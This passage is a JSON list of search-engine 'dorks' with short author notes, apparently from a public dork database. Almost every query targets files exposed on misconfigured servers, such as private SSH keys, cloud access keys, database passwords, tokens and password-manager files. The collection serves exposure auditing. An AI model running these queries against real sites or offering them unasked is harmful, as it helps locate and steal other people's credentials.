intitle:\"index of/\" \"db.sql\"\r\n\r\nintitle:\"index of/\" \"db.sql\"\r\n\r\nBy Ishan Saha"}, {"dork": "intitle:index.of \"cacert.pem\"", "description": "Files Contain sensitive information.\r\n\r\nMalkit Singh"}, {"dork": "intitle:\"index of\" /\"privatekey.txt\" OR \"private key.txt\"", "description": "Hi,\r\n\r\nI have discovered this dork that can help us find private keys that are\r\nsaved in text file.\r\n\r\nJuveria Banu."}, {"dork": "intext:\"index of /\" \"auth.json\"", "description": "intext:\"index of /\" \"auth.json\"\r\n\r\nby\r\n\r\nSagar Banwa"}, {"dork": "intitle:\"index of\" \"php.ini\"", "description": "Files Containing Juicy info:\r\n\r\nintitle:\"index of\" \"php.ini\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"settings.py\"", "description": "files containing juicy info:\r\n\r\nintitle:\"index of\" \"settings.py\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" accounts.xml", "description": "pages containing juicy info:\r\n\r\nintitle:\"index of\" accounts.xml\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"access_token\"", "description": "Category : Files Containing Juicy Info\r\n\r\nintitle:\"index of\" \"access_token\"\r\n\r\nBy : Keval Sheth"}, {"dork": "intitle:\"index of\" \"backup.bak\"", "description": "Google Dorks Query to find backup files.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"backup.bak\"*"}, {"dork": "intitle:\"index of\" \"settings.yml\"", "description": "Google Dork Query to find out insecure and sensitve settings.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"settings.yml\"*"}, {"dork": "intitle:\"index of\" \"backup.yml\"", "description": "Google Dork Query to find out insecure and sensitive backup.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"backup.yml\"*"}, {"dork": "intitle:\"index of\" \"secrets.yml\"", "description": "Google Dork Query to find out insecure and sensitve secrets.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"secrets.yml\"*"}, {"dork": "intitle:\"index of\" database.yml", "description": "# Google Dork: \r\nintitle:\"index of\" database.yml\r\nintitle:\"index of\" database.yml.ci\r\nintitle:\"index of\" \"database-old.yml\"\r\n\r\n# By using this dork, sensitive directories and databases' username and\r\npassword can be found.\r\n\r\n# Date: 17/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"configuration.yml\"", "description": "# Google Dork: intitle:\"index of\" \"configuration.yml\"\r\n\r\n# By using this dork, files containing username and password can be found.\r\n\r\n# Date: 18/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"index of /\" \"token.yml\"", "description": "Description : intext:\"index of /\" \"token.yml\"\r\n\r\nThis google dork gives us the secret tokens and access tokens of\r\nmisconfigured servers."}, {"dork": "\"# Kickstart\" filetype:cfg", "description": "# Google Dork: # Kickstart filetype:cfg\r\n\r\n# By using this dork, kickstart configuration files that contain\r\ninteresting information and root passwords (hashed) can be found.\r\n\r\n# Date: 19/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:-cfg intext:\"password cipher\"", "description": "# Google Dork: inurl:-cfg intext:\"password cipher\"\r\n\r\n# By using this dork, passwords ciphers in configuration files can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"mysql.properties\"", "description": "This google dork gives us the mysq properties and sensitive details of\r\nmisconfigured servers."}, {"dork": "intext:\"dspace.cfg\" \"db.username = dspace\"", "description": "# Google Dork: \r\nintext:\"dspace.cfg\" \"db.username = dspace\"\r\nintext:\"dspace.cfg\" \"db.username = dspace\" \"db.password =\"\r\n\r\n# By using this dork, usernames and passwords in configuration files can be\r\nfound.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:cfg intext:\"srb.username.1=\" \"srb.password.1 = \"", "description": "# Google Dork: inurl:cfg intext:\"srb.username.1=\" \"srb.password.1 = \"\r\n\r\n# By using this dork, usernames and passwords in configuration files can be\r\nfound.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:cfg tac_plus.cfg", "description": "# Google Dork: ext:cfg tac_plus.cfg\r\n\r\n# By using this dork, admin passwords and much more, in configuration files\r\ncan be found.\r\n\r\n# Date: 21/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "filetype:reg reg [HKEY_CURRENT_USERSoftware] -git", "description": "# Google Dork: filetype:reg reg [HKEY_CURRENT_USER\\Software\\] -git\r\n\r\n# By using this dork, some passwords for WinVNC and FAR plugins for Mail,\r\nFTP and ProxyFTP can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "filetype:reg reg HKEY_CLASSES_ROOT -git", "description": "# Google Dork: filetype:reg reg HKEY_CLASSES_ROOT -git\r\n\r\n# By using this dork, the HKEY_CLASSES_ROOT (HKCR) key that contains file\r\nname extension associations and COM class registration information such as\r\nProgIDs, CLSIDs, and IIDs. can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "filetype:reg reg HKEY_USERS -git", "description": "# Google Dork: filetype:reg reg HKEY_USERS -git\r\n\r\n# By using this dork, the HKEY_USERS contains user-specific configuration\r\ninformation for all currently active users on a computer can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" cvsweb.conf", "description": "# Google Dork: intitle:\"index of\" cvsweb.conf\r\n\r\n# By using this dork, cvsweb configuration files with juicy information and\r\nsometimes with exposed passwords can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"Current Configuration:\" ext:cfg -git", "description": "# Google Dork: intext:\"Current Configuration:\" ext:cfg -git\r\n\r\n# By using this dork, some user names and passwords in configuration files\r\ncan be found.\r\n\r\n# Date: 7/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"vpn-config.*\"", "description": "This dork found some juicy information about the vpn-config file.\r\n\r\nGoogle Dork : intitle:\"index of\" \"vpn-config.*\"\r\n\r\nAuthor : Berat ISLER (root1x)"}, {"dork": "intitle:\"index of\" default.rdp", "description": "Description: intitle:\"index of\" default.rdp\r\nThis google dork gives us the Remote Desktop Protocol Connection\r\nInformation.\r\nRDP contains juicy information about settings and credentials of windows\r\ncomputer."}, {"dork": "intitle:\"index of\" errorlog.txt", "description": "# Google Dork: intitle:\"index of\" errorlog.txt\r\n\r\n# Juicy information, and sometimes usernames and passwords can be found.\r\n\r\n# Date: 17/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN OpenVPN Static key V1-----\" ext:key", "description": "# Google Dork: \"-----BEGIN OpenVPN Static key V1-----\" ext:key\r\n\r\n# OpenVPN static keys.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN CERTIFICATE-----\" ext:pem -git", "description": "# Google Dork: \"-----BEGIN CERTIFICATE-----\" ext:pem -git\r\n\r\n# Various certificates including ssl, root, X509, etc.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"SecretAccessKey\" OR \"AccessKeyId\" ext:txt OR ext:cfg -git", "description": "# Google Dork: \"SecretAccessKey\" OR \"AccessKeyId\" ext:txt OR ext:cfg -git\r\n\r\n# Configuration files containing credentials.\r\n\r\n# Date: 23/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" db_mysql.inc", "description": "# Google Dork: intitle:\"Index of\" db_mysql.inc\r\n\r\n# Configuration files containing some times database usernames and\r\npasswords.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" db.inc", "description": "# Google Dork: intitle:\"Index of\" db.inc\r\n\r\n# Configuration files containing some times database usernames and\r\npasswords.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"DBPassword\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git", "description": "# Google Dorks: \r\n\"DBPassword\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git\r\n\"DBUsername\" ext:cfg OR ext:log OR ext:txt OR ext:sql -git\r\n\r\n# By using this dork some exposed database passwords can be found.\r\n\r\n# Date: 27/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"syslog\"", "description": "#Description: intitle:\"index of\" \"syslog\"\r\nThis Google dork shows juicy information about the website and their system\r\nlogs.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 28 April 2020"}, {"dork": "intitle:\"index of\" \"/cron.log\"", "description": "#Description: intitle:\"index of\" \"/cron.log\"\r\nThis Google dork shows juicy information about the website and their\r\ncrontab logs.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 28 April 2020"}, {"dork": "intitle:\"index of\" keepass.kdbx OR database.kdbx", "description": "# Google Dork: intitle:\"index of\" keepass.kdbx OR database.kdbx\r\n\r\n# KeePass database key file in open web directories.\r\n\r\n# Date: 28/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" apache.log", "description": "Dork: intitle: \"index of\" apache.log\r\nDescription: This Google dork shows juicy information about the website and\r\nfinds out publicly available *apache logs* that contain sensitive\r\ninformation & can be exploited by the hacker.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" machine.config", "description": "Dork: intitle:\"index of\" machine.config\r\nDescription: This Google dork lists out machine.config files for asp .net\r\nwebsites\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" /known_hosts", "description": "# Google Dork: intitle:\"index of\" /known_hosts\r\n\r\n# List of pubkeys of known SSH servers.\r\n\r\n# Date: 29/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" /.ssh/id_rsa OR id_rsa.pub", "description": "# Google Dork: \r\nintitle:\"index of\" /.ssh/id_rsa OR id_rsa.pub\r\nintitle:\"index of\" /ssh_host_ecdsa_key OR ssh_host_ecdsa_key.pub\r\nintitle:\"index of\" /ssh_host_rsa_key OR ssh_host_rsa_key.pub\r\nintitle:\"index of\" /ssh_host_key OR ssh_host_key.pub\r\nintitle:\"index of\" /id_ecdsa OR id_ecdsa.pub\r\nintitle:\"index of\" /.ssh/id_dsa OR id_dsa.pub\r\n\r\n# RSA private and public keys.\r\n\r\n# Date: 29/04/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" db.json", "description": "Dork: intitle:\"index of\" db.json\r\nDescription: This Google dork lists out sensitive .json database files for\r\nwebsites\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" license-key.txt", "description": "Dork: intitle:\"index of\" license-key.txt\r\nDescription: This Google dork lists out license keys leaked for various\r\nsoftware/services.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" settings.xml", "description": "Dork: intitle:\"index of\" settings.xml\r\nDescription: This Google dork lists out sensitive settings.xml files for\r\napps/websites.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"settings.ini\" intext:\"fbconnectkey =\" intext:\"msverify =\"", "description": "# Google Dork: \"settings.ini\" intext:\"fbconnectkey =\" intext:\"msverify =\"\r\n\r\n# Juicy information located into settings.ini files.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"keys.ini\"", "description": "# Google Dork: intitle:\"index of\" \"keys.ini\"\r\n\r\n# Juicy information located into keys.ini files. Various Windows\r\nactivation keys categorized by #OS|Type|Brand|Key.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.json\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.json\"\r\n\r\n# Juicy information including credentials, client IDs, tokens and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"client_secret.json\" OR \"client secret\" OR \"client_secret live.json\"", "description": "# Google Dork: intitle:\"index of\" \"client_secret.json\" OR \"client secret\"\r\nOR \"client_secret live.json\"\r\n\r\n# Juicy information including credentials, client IDs, tokens and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"token.json\"", "description": "# Google Dork: intitle:\"index of\" \"token.json\"\r\n\r\n# Juicy information including access tokens and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" /insecure_private_key", "description": "# Google Dork: intitle:\"index of\" /insecure_private_key\r\n\r\n# RSA private keys.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"credentials.ini\"", "description": "# Google Dork: intitle:\"index of\" \"credentials.ini\"\r\n\r\n# Juicy information including some times access tokens, user names,\r\npasswords and more.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"dovecot.key\" OR \"dovecot.crt.cache\" OR \"dovecot.crt\"", "description": "# Google Dork: intitle:\"index of\" \"dovecot.key\" OR \"dovecot.crt.cache\" OR\r\n\"dovecot.crt\"\r\n\r\n# Juicy information and sensitive directories which in many cases are\r\nrestricted. However, there is lots of nice information into\r\nthe \"dovecot.crt.cache\" files.\r\n\r\n# Date: 30/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"users.ini\"", "description": "Dork: intitle:\"index of\" \"users.ini\"\r\nDescription: This Google dork lists out sensitive user.ini files which\r\ncontain user parameters for a particular website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/accounts.txt\"", "description": "#Description: intitle:\"index of\" \"/accounts.txt\"\r\nThis Google dork shows juicy information about the website and their\r\nsensitive data.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 30 April 2020"}, {"dork": "intitle:\"index of\" dataSources.local.xml", "description": "Dork: intitle:\"index of\" dataSources.local.xml\r\nDescription: This Google dork lists out sensitive local database\r\nconfiguration parameters for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" apis.json", "description": "Dork: intitle:\"index of\" apis.json\r\nDescription: This Google dork lists out sensitive api credentials and\r\nparameters for apis running on a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" admin.txt", "description": "Dork: intitle:\"index of\" admin.txt\r\nDescription: This Google dork lists out admin login credentials stored in a\r\nfile named \"admin.txt\" for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"parameters.yml.test\" OR \"parameters.yml.dist\"", "description": "# Google Dork: intitle:\"index of\" \"parameters.yml.test\" OR\r\n\"parameters.yml.dist\"\r\n\r\n# Juicy information and sensitive directories including mostly secret\r\ntokens, user names and some times passwords.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"docker-cloud.yml\"", "description": "# Google Dork: \r\nintitle:\"index of\" \"docker-cloud.yml\"\r\nintitle:\"index of\" \"docker-compose.dev.yml\" OR \"docker-compose.prod.yml\" OR \"docker-compose.test.yml\"\r\n\r\n# Juicy information and sensitive directories including user names and\r\npasswords.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"application.yml\"", "description": "# Google Dork: intitle:\"index of\" \"application.yml\"\r\n\r\n# Juicy information and sensitive directories including in many case,\r\nmostly secret tokens, user names and passwords.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"database.json\"", "description": "# Google Dork: intitle:\"index of\" \"database.json\"\r\n\r\n# By using this dork, user names, passwords and database credentials some\r\ntimes can be found.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intext:\"laravel\" ext:env intext:\"db_password\" -git", "description": "# Google Dork: intext:\"laravel\" ext:env intext:\"db_password\" -git\r\n\r\n# Laravel Database credentials.\r\n\r\n# Date: 1/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"accounts.json\"", "description": "Dork: \r\nintitle:\"index of\" \"accounts.json\"\r\nintitle:\"index of\" \"accounts.rar\"\r\n\r\nDescription: This Google dork lists out account details stored in a file\r\nnamed \"account.json\" for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"admin.bak\"", "description": "Dork: intitle:\"index of\" \"admin.bak\"\r\nDescription: This Google dork lists out admin backup files for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"settings.yaml\"", "description": "Dork: intitle:\"index of\" \"settings.yaml\"\r\nDescription: This Google dork lists out sensitive configuration files\r\nstored in the \"settings.yaml\" for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"api.yaml\"", "description": "Dork: intitle:\"index of\" \"api.yaml\"\r\nDescription: This Google dork lists out sensitive api configuration data\r\nstored in the \"api.yaml\" file for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"client_id.json\"", "description": "Dork: intitle:\"index of\" \"client_id.json\"\r\nDescription: This Google dork lists out sensitive client ids stored in the\r\n\"client_id.json\" file for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/config.bak\"", "description": "#Description: intitle:\"index of\" \"/config.bak\"\r\nThis Google dork shows juicy information about the configuration files of\r\nthe website and some sensitive directories.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 3 May2020"}, {"dork": "intitle:\"index of\" \"/yum.log\"", "description": "#Description: intitle:\"index of\" \"/yum.log\"\r\nThis Google dork shows juicy information about the website and their yum\r\nlogs.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 3 May 2020"}, {"dork": "intitle:\"index of\" \"/users.xls\"", "description": "#Description : intitle:\"index of\" \"/users.xls\"\r\nThis Google dork shows juicy information about the website and their\r\nusernames in excel format.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 3 May 2020"}, {"dork": "intitle:\"index of\" \"Logins.txt\"", "description": "# Google Dork: intitle:\"index of\" \"Logins.txt\"\r\n\r\n# Juicy information and sensitive directories including in many case, user\r\nnames and passwords.\r\n\r\n# Date: 5/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"keys.asc\"", "description": "# Google Dork: intitle:\"index of\" \"keys.asc\"\r\n\r\n# Juicy information and sensitive directories.\r\n\r\n# Date: 5/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"login.txt\"", "description": "Exposes the login.txt file containing login credentials\r\n\r\n-Juveria Banu"}, {"dork": "intitle:\"index of\" \"auth.log\"", "description": "Dork: intitle:\"index of\" \"auth.log\"\r\nDescription: This Google dork lists out sensitive auth logs stored in a\r\n\"auth.log\" file for a linux web-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" users.bak", "description": "Dork: intitle:\"index of\" users.bak\r\nDescription: This Google dork lists out sensitive user data backups stored\r\nin a \"users.bak\" file for a web-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=", "description": "Dork:\r\ninurl:administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=\r\nDescription: This Google dork lists out config details for a administrator\r\ncomponents of a web-server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"secret.js\"", "description": "Dork: intitle:\"index of\" \"secret.js\"\r\nDescription: This google dork lists out sites secret javascript files for a\r\nweb server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"local.json\"", "description": "Dork: intitle:\"index of\" \"local.json\"\r\nDescription: This google dork lists out local configuration settings for a\r\nweb server.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"oauth-credentials.json\"", "description": "Dork: \r\nintitle:\"index of\" \"oauth-credentials.json\"\r\nintitle:\"index of\" \"oauth.json\"\r\n\r\nDescription: This google dork lists oauth credentials for a webserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"backup.js\"", "description": "Dork: \r\nintitle:\"index of\" \"backup.js\"\r\nintitle:\"index of\" \"backup.json\"\r\n\r\nDescription: This google dork lists out the javascript backup logic for\r\nwebsites.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"debian-security.log\"", "description": "Dork: \r\nintitle:\"index of\" \"debian-security.log\"\r\nintitle:\"index of\" \"linux.log\"\r\n\r\nDescription: This google dork lists out the debian security logs for\r\nwebsites.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"auth.asc\"", "description": "Dork: \r\nintitle:\"index of\" \"auth.asc\"\r\nintitle:\"index of\" \"auth.txt\"\r\n\r\nDescription: This google dork lists out sensitive information regarding\r\nauthentication.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"security.json\"", "description": "Dork: intitle:\"index of\" \"security.json\"\r\nDescription: This google dork lists out sensitive security logs in web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"google-api-private-key.json\"", "description": "Dork: intitle:\"index of\" \"google-api-private-key.json\"\r\nDescription: This google dork lists out google api private keys in web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"secrets.py\"", "description": "Dork: intitle:\"index of\" \"secrets.py\"\r\nDescription: This google dork lists secret python files in a webserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"cfg.go\"", "description": "The configuration file of the websites using GOLANG in backend can be\r\neasily found by using this dork\r\n\r\nDORK: intitle:\"index of\" \"cfg.go\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"config.rb\"", "description": "This dork is used to find the configuration files of websites using Ruby in\r\nbackend.\r\n\r\nDORK: intitle:\"index of\" \"config.rb\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"login.docx\"", "description": "Find sensitive information using this dork.\r\n\r\nDORK: intitle:\"index of\" \"login.docx\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"config.pl\"", "description": "This can be used to find the configuration file of a website using Perl in\r\nbackend.\r\n\r\nDORK: intitle:\"index of\" \"config.pl\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"manage.py\"", "description": "The configuration file of websites using DJANGO (Python) as backend.\r\n\r\nDORK: intitle:\"index of\" \"manage.py\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"index of\" \"config.js\"", "description": "Using this dork, the configuration file of websites using Express Js as\r\nbackend can be found.\r\n\r\nDORK: intitle:\"index of\" \"config.js\"\r\n\r\n~ Irshad Ahamed"}, {"dork": "intitle:\"Index of\" test.logs", "description": "# Google Dork: intitle:\"Index of\" test.logs\r\n\r\n# Juicy information and sensitive directories.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"queue.log\"", "description": "# Google Dork: intitle:\"index of\" \"queue.log\"\r\n\r\n# Juicy information and sensitive directories, including usernames, unique\r\nIDs and more.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"web.log\" OR \"web.logs\"", "description": "# Google Dork: intitle:\"index of\" \"web.log\" OR \"web.logs\"\r\n\r\n# Juicy information and sensitive directories, including usernames, unique\r\nIDs and more.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"admin.jsp\"", "description": "Dork: intitle:\"index of\" \"admin.jsp\"\r\nDescription: This Google dork lists out sensitive admin java servlet pages\r\nfor a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"postgresql.conf\"", "description": "Dork: intitle:\"index of\" \"postgresql.conf\"\r\nDescription: This Google dork lists out sensitive config data for the\r\npostgresql database on a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"Index of\" \"backup-audio-queue.log\" OR \"backup-audio.log\" OR \"backup-mysql.log\"", "description": "# Google Dork: intitle:\"Index of\" \"backup-audio-queue.log\" OR \"backup-audio.log\" OR \"backup-mysql.log\"\r\n\r\n# Juicy information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"token_info.json\" OR \"get_access_token.json\"", "description": "# Google Dork: intitle:\"index of\" \"token_info.json\" OR \"get_access_token.json\"\r\n\r\n# Juicy information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"fullchain.pem\" OR \"chain.pem\"", "description": "# Google Dork: intitle:\"index of\" \"fullchain.pem\" OR \"chain.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"users.txt\"", "description": "# Google Dork: intitle:\"index of\" \"users.txt\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of\" \"ca-key.pem\" OR \"ca-req.pem\"", "description": "# Google Dork: \r\nintitle:\"Index of\" \"ca-key.pem\" OR \"ca-req.pem\"\r\nintitle:\"index of\" \"rsa8192.pem\"\r\nintitle:\"index of\" \"server.pem\"\r\nintitle:\"index of\" \"s512-key.pem\" OR \"s1024key.pem\"\r\nintitle:\"index of\" \"dsa512.pem\" OR \"dsa1024.pem\" OR \"dsap.pem\"\r\nintitle:\"index of\" \"dh512.pem\" OR \"dh1024.pem\" OR \"dh2048.pem\" OR \"dh4096.pem\"\r\nintitle:\"index of\" \"dsa-ca.pem\" OR \"dsa-pca.pem\"\r\nintitle:\"index of\" \"pca-cert.pem\" OR \"ca-cert.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 7/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "\"index of\" \"wp-config.zip\"", "description": "Dork: \"index of\" \"wp-config.zip\"\r\nDescription: This Google dork can be used to discover publicly available\r\nZIP files containing wp-config.php file which has sensitive WordPress\r\ninformation.\r\nAuthor: Jinson Varghese Behanan (@JinsonCyberSec)\r\nAuthor Homepage: https://www.jinsonvarghese.com"}, {"dork": "intitle:\"index of\" \"cassandra-yaml\"", "description": "Dork: intitle:\"index of\" \"cassandra-yaml\"\r\nDescription: This Google dork lists out sensitive data for the cassandra\r\ndbms on a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"configure.in\"", "description": "Dork: intitle:\"index of\" \"configure.in\"\r\nDescription: This Google dork lists out sensitive data for the altibase\r\ndbms on a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"user data.txt\"", "description": "Dork: intitle:\"index of\" \"user data.txt\"\r\nDescription: This Google dork lists out sensitive user data for a web server\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"jsapi_ticket.json\"", "description": "Dork: intitle:\"index of\" \"jsapi_ticket.json\"\r\nDescription: This Google dork lists out sensitive jsapi data for a web\r\nserver\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"mvn-settings.xml\"", "description": "This Google dork finds Maven settings files on web servers.\r\n\r\nintitle:\"index of\" \"mvn-settings.xml\"\r\n \r\n--\r\nBlackBelu.ga"}, {"dork": "intitle:\"index of\" \"refresh_token.txt\" OR \"access_token.txt\" OR \"jsapi_ticket.txt\"", "description": "# Google Dork: intitle:\"index of\" \"refresh_token.txt\" OR \"access_token.txt\"\r\nOR \"jsapi_ticket.txt\"\r\n\r\n# Juicy and sensitive information including tokens and more.\r\n\r\n# Date: 9/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"*root.pem\"", "description": "# Google Dork: intitle:\"index of\" \"*root.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 10/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"token.txt\"", "description": "Dork: intitle:\"index of\" \"token.txt\"\r\nDescription: This google dork lists out sensitive tokens used on a web\r\nserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"dhparams.pem\"", "description": "# Google Dork: \r\nintitle:\"index of\" \"dhparams.pem\"\r\nintitle:\"index of\" \"bundle.pem\"\r\n\r\n# Juicy and sensitive information.\r\n\r\n# Date: 13/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"wpadmin-secure.htaccess\"", "description": "AUTHOR: ABHIJITH A\r\nCATEGORY: Sensitive Directories\r\nDESCRIPTION: intitle:\"index of\" \"wpadmin-secure.htaccess\""}, {"dork": "intitle:\"index of\" \"privkey.pem\"", "description": "Dork: intitle:\"index of\" \"privkey.pem\"\r\nDescription: This google dork lists out secret private keys of a website.\r\nAuthor: Abhi 